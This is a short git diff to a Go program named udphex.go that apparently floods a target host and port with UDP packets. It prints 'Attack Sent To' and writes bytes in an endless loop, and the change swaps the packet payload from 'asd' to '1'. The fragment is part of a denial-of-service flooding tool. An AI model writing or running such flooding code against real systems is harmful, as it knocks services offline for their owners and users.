diff --git a/udphex.go b/udphex.go index f69f9a1..bed659b 100644 --- a/udphex.go +++ b/udphex.go @@ -15,7 +15,7 @@ func main() { } else { fmt.Println("Attack Sent To " + target + ":" + port) for { - conn.Write([]byte("\x61\x73\x64")) + conn.Write([]byte("\x31")) } } }